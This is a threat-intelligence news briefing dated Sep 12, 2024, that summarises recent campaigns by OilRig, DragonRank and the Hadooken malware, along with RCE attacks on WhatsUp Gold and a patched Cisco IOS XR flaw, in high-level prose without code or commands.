Cyware Daily Threat Intelligence
Daily Threat Briefing • Sep 12, 2024
We use cookies to improve your experience. Do you accept?
Daily Threat Briefing • Sep 12, 2024
OilRig is turning up the heat in Iraq, targeting high-profile government networks. With new malware families, Veaty and Spearal, at their disposal, the group is executing PowerShell commands and harvesting critical files.
DragonRank, a newly discovered threat activity cluster, is spreading across Asia and Europe, leveraging web shells and SEO manipulation to compromise web applications. The group behind DragonRank has already targeted over 35 IIS servers across multiple countries.
Meanwhile, Progress Software’s WhatsUp Gold is facing a critical security threat, as attackers exploit high-risk vulnerabilities to turn legitimate PowerShell scripts into tools for remote access, putting network monitoring systems at the mercy of sophisticated RCE attacks.
OilRig targets Iraqi government
The Iranian state-sponsored threat actor OilRig launched a sophisticated campaign targeting Iraqi government networks, including organizations such as the Prime Minister's Office and the Ministry of Foreign Affairs. The recent campaign involves new malware families called Veaty and Spearal, which enable the execution of PowerShell commands and file harvesting. Check Point also discovered a third SSH tunneling backdoor associated with the threat actor infrastructure and an HTTP-based backdoor, CacheHttp. dll, targeting Microsoft's IIS servers.
New Linux malware targets Weblogic apps
Aqua Nautilus uncovered a new Linux malware, known as Hadooken, targeting Weblogic servers. This malware drops the Tsunami malware and deploys a cryptominer upon execution. The attackers exploited weak passwords to gain access and execute remote code on WebLogic servers. The malware creates cronjobs for persistence and deletes logs to evade detection. The malware also attempts lateral movement through SSH hijacking and performs resource hijacking with the cryptominer.
**Meet the new DragonRank SEO manipulator service **
Cisco Talos discovered a new threat named DragonRank that targets countries in Asia and some in Europe using PlugX and BadIIS for SEO manipulation. DragonRank infiltrates web applications to deploy web shells, gather system information, and launch malware, along with credential-harvesting tools. The group has compromised over 35 IIS servers in countries including Thailand, India, Korea, Belgium, the Netherlands, and China. DragonRank is linked to a Simplified Chinese-speaking actor through their commercial website and messaging accounts.
RCE attacks on WhatsUp Gold
Trend Micro observed RCE attacks on WhatsUp Gold, a network and IT infrastructure monitoring application provided by Progress Software Corporation for Windows systems. These attacks exploited vulnerabilities CVE-2024-6670 and CVE-2024-6671, which were disclosed by the vendor on August 16. The vulnerabilities allowed unauthenticated attackers to retrieve encrypted passwords, with both scoring 9. 8 on the CVSS scale, indicating a high risk of RCE. The attacks utilized the Active Monitor PowerShell Script, a legitimate feature of WhatsUp Gold, to execute malicious code on targeted systems. The threat actor employed various PowerShell scripts to download and install remote access tools (RATs) via msiexec. exe, including Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote.
**Critical Cisco software flaw patched **
A critical vulnerability (CVE-2024-20304) in Cisco IOS XR Software's multicast traceroute feature, Mtrace2, allows remote attackers to exhaust UDP packet memory, potentially causing denial of service (DoS) and privilege escalation. Attackers can exploit this flaw by sending crafted packets, leading to UDP packet memory exhaustion, preventing proper processing, and a DoS condition. Devices running specific releases of Cisco IOS XR Software are affected unless mitigations are implemented, such as deactivating Multicast RPM and deploying Infrastructure Access Control Lists. Cisco has issued software updates to address this and three other vulnerabilities (CVE-2024-20317, CVE-2024-20406, CVE-2024-20398).